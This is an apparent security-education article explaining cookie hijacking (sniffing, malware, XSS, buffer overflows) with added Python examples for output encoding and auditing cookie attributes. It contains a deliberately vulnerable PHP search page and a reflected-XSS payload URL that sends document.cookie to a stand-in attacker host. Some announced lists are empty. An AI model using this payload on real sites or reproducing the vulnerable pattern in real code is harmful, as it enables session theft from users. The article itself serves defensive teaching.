In a cookie hijacking attack, the attacker steals HTTP cookies by eavesdropping on the communication between a user and a web application, gaining access to the user’s computer or web browser data, or gaining access to the web server memory. Attackers can perform cookie hijacking using techniques that include exploiting cross-site scripting (XSS) vulnerabilities, performing man-in-the-middle (MITM) attacks, exploiting buffer overflow vulnerabilities on web servers, or planting malware such as trojans.
Cookie hijacking is often confused with cookie poisoning. In cybersecurity, the term poisoning describes attacks in which a malicious hacker injects malicious content into data while it is being transmitted. The term hijacking, on the other hand, is used for attacks in which malicious hackers attempt to access (read) the data being transmitted.
Note that you may see some web resources incorrectly using the term cookie poisoning for all attacks even loosely related to cookies, including various types of session hijacking and even session fixation or brute-force session prediction.
The terms cookie hijacking and session hijacking are closely related but are not the same. Users’ session IDs, which are a common authentication mechanism for web apps, are most often handled using cookies. In these cases, session hijacking uses the same techniques as cookie hijacking. However, some web applications may handle session tokens in a different way, for example, using custom HTTP headers. For these apps, session hijacking attacks would use other techniques than cookie hijacking.
Cookies are also used for other types of functionality than just working with browser sessions, so they may contain sensitive information other than session IDs. While the hijacking techniques for such cookies will be the same as for web session cookies, the attacker may have a very different goal.
There are four main approaches to cookie hijacking: eavesdropping on user communication, gaining access to the user’s computer, gaining access to the user’s browser data, or gaining access to the web server memory used to store cookies.
Cookie hijacking techniques often rely on man-in-the-middle (MITM) attacks. In the simplest case, when traffic is not encrypted, an attacker only needs a simple packet sniffer on the same local network as the client to monitor user connections and capture cookies in transit. This is especially common on public Wi-Fi networks.
If a website or web application uses exclusively encrypted connections, simple cookie sniffing won’t work, but there are other tricks that may be attempted. Some examples include:
In many cases, attackers attempt to infect user computer systems with malware such as trojans for the purpose of obtaining session information. A well-known example of this is the man-in-the-browser attack, where session identifiers are stolen directly from the user’s web browser.
One of the most effective ways for an attacker to obtain access to a cookie is to use a cross-site scripting attack. If your website or web application has an XSS vulnerability, the attacker would start by tricking a user into visiting your vulnerable page through a specially crafted URL (typically through phishing). The victim is then redirected to a page that executes malicious client-side scripts in the client browser. The malicious JavaScript code accesses the user’s cookie and sends it to an attacker-controlled server.
Here is an example of a reflected cross-site scripting (XSS) vulnerability that could be used to steal a user’s cookies:
<?php
// Deliberately vulnerable example: the raw 'search' parameter is echoed
// into the HTML response without any output encoding.
// search_database() is assumed to exist elsewhere in the application.
if (isset($_GET['search']))
{
    $results = search_database($_GET['search']);
    // Reflected XSS: attacker-controlled input lands directly in the page
    echo 'Results for "'.$_GET['search'].'":<br/>';
    foreach ($results as $result)
    {
        echo $result['result']."<br/>";
    }
}
?>
An attacker could inject malicious code into the search parameter to send the user’s cookie to a server they control:
http://example.com/search.php?search=<script>document.location='http://bad.example.com/thief.php?data='+document.cookie</script>
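The following is an added example, not code from the original article: it reproduces the flaw of the PHP snippet above in Python and places the corrected version beside it, using the article's own URL as the test input. Contextual HTML output encoding (here Python's `html.escape`) is the fix that stops the reflected parameter from being interpreted as markup; `fake_search_database` and the result rows are constructed stand-ins for the page's `search_database()`.

```python
import html
from urllib.parse import parse_qs, urlsplit

# Constructed input: the crafted URL shown in the article.
ATTACK_URL = ("http://example.com/search.php?search=<script>document.location="
              "'http://bad.example.com/thief.php?data='+document.cookie</script>")


def fake_search_database(term):
    """Stand-in for the page's search_database(); returns constructed rows."""
    return [{"result": "Cookie recipes"}, {"result": "Cookie policy"}]


def search_term_from_url(url):
    """Extract the 'search' query parameter the way $_GET would ('+' becomes a space)."""
    params = parse_qs(urlsplit(url).query)
    return params.get("search", [""])[0]


def render_vulnerable(search, results):
    """Mirrors the PHP snippet: raw input is concatenated straight into HTML."""
    out = f'Results for "{search}":<br/>'
    for row in results:
        out += row["result"] + "<br/>"
    return out


def render_hardened(search, results):
    """Same page, but every untrusted value is HTML-encoded for the element context.
    quote=True also encodes quotes, so the value is safe inside attributes too."""
    out = f'Results for "{html.escape(search, quote=True)}":<br/>'
    for row in results:
        out += html.escape(row["result"], quote=True) + "<br/>"
    return out


def contains_script_tag(page):
    """Simple detection check used here to compare the two renderings."""
    return "<script" in page.lower()


if __name__ == "__main__":
    term = search_term_from_url(ATTACK_URL)
    rows = fake_search_database(term)
    print("vulnerable page executes script:", contains_script_tag(render_vulnerable(term, rows)))
    print("hardened page executes script:  ", contains_script_tag(render_hardened(term, rows)))
```

Encoding at output time is the correct place for this fix; filtering `<script>` out of the input would miss the many other ways a browser can be made to execute markup.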
The content of cookies may also be accessed by unauthorized parties using buffer overflow attacks. If the web server runs software that is vulnerable to buffer overflow attacks, attackers may be able to read server memory containing data for the most recent cookies.
However, this type of attack is very rare and poses little security risk. Not many applications installed on web servers are vulnerable to buffer overflow, and even if they are, it would be a rare coincidence for a successful attacker to find and recognize cookies for a particular web page in memory. Note that buffer overflow errors are extremely rare in web applications because most popular languages used to create them, such as PHP, Java, and JavaScript, don’t allow direct memory manipulation, so buffer overflows in application code written in those languages are not possible.
Most cookie hijacking attacks target the user (for example, trojan-based attacks and man-in-the-middle attacks) and have nothing to do with the web application itself. These attacks can only be detected by monitoring user computers and user connections.
However, some cookie hijacking attacks are also made possible by cross-site scripting vulnerabilities. By scanning your web applications to find these vulnerabilities and then fixing the identified issues, you can reduce the risk of cookie hijacking. Read more about how to detect and fix XSS vulnerabilities.
To help prevent cookie hijacking attacks, follow these recommendations:
Cookie hijacking happens when an attacker gains access to the content of cookies by eavesdropping on the communication between a user and a web application, gaining access to the user’s computer or web browser data, or gaining access to web server memory. Because session management is usually done with cookies, cookie hijacking is often used to steal user session data.
Read more about session hijacking attacks – a category closely related to cookie hijacking.
The risks associated with a successful cookie hijacking attack depend on the content of the cookies. If a session cookie is accessed, the attacker may gain unauthorized access to a user’s web application account. The extent of damage depends entirely on the functionality of the web application and the privileges of the user. For example, if the attacker is able to access an administrative account for a major web application, they may expose large amounts of highly sensitive information useful for identity theft.
Learn more about application security practices that help avoid attacks such as session hijacking.
There is no simple way for an app developer to prevent all cookie hijacking attacks, but you can encrypt all traffic between the user and the web application to make accessing cookies in transit more difficult. You can even separately encrypt cookie content to make sure that cookie hijacking is not useful to the attacker even if they gain access to the web server or exploit a cross-site scripting vulnerability.
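As an added example (not part of the original article), the block below shows the cookie attributes that address the hijacking paths described on this page, and an audit function a defender can run over a server's Set-Cookie headers to spot cookies that lack them: `Secure` keeps the cookie off plaintext connections that a sniffer could read, `HttpOnly` hides it from `document.cookie` so the XSS payload above cannot exfiltrate it, and `SameSite` limits cross-site sending. The header strings are constructed samples; encryption of cookie content, which the paragraph also mentions, is not shown here.

```python
import re
import secrets

# Attributes whose absence the audit reports, keyed by their lowercase form.
REQUIRED_ATTRS = {"secure": "Secure", "httponly": "HttpOnly"}


def new_session_id():
    """Opaque, unguessable session identifier (256 bits from the CSPRNG)."""
    return secrets.token_urlsafe(32)


def build_session_cookie(name, value, max_age=3600, samesite="Lax"):
    """Return a Set-Cookie header value carrying the hardening attributes."""
    if samesite not in ("Strict", "Lax", "None"):
        raise ValueError("SameSite must be Strict, Lax or None")
    # RFC 6265 forbids whitespace, ';', ',' and '"' in a cookie value.
    if re.search(r'[\s;,"]', value):
        raise ValueError("cookie value contains characters not allowed by RFC 6265")
    parts = [
        f"{name}={value}",
        "Path=/",
        f"Max-Age={max_age}",
        "Secure",      # not sent over plain HTTP
        "HttpOnly",    # not readable from JavaScript
        f"SameSite={samesite}",
    ]
    return "; ".join(parts)


def audit_set_cookie(header_value):
    """Return a list of findings for one Set-Cookie header (empty list = hardened)."""
    pieces = [p.strip() for p in header_value.split(";")]
    attrs = {}
    for attr in pieces[1:]:  # pieces[0] is name=value
        key, _, val = attr.partition("=")
        attrs[key.strip().lower()] = val.strip()

    findings = []
    for key, display in REQUIRED_ATTRS.items():
        if key not in attrs:
            findings.append(f"missing {display}")
    samesite = attrs.get("samesite")
    if samesite is None:
        findings.append("missing SameSite")
    elif samesite.lower() == "none" and "secure" not in attrs:
        findings.append("SameSite=None without Secure is rejected by browsers")
    return findings


# Constructed sample headers: a weak one and a hardened one.
SAMPLE_HEADERS = [
    "PHPSESSID=abc123; Path=/",
    build_session_cookie("PHPSESSID", "abc123"),
]

if __name__ == "__main__":
    for header in SAMPLE_HEADERS:
        print(header)
        print("  findings:", audit_set_cookie(header) or "none")
    print(build_session_cookie("sid", new_session_id()))
```

Run the audit against the headers your own application emits (for example, those captured during a scan); a non-empty finding list for a session cookie is worth fixing before looking for more exotic attack paths.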
Read about cross-site scripting (XSS) vulnerabilities that may lead to cookie hijacking.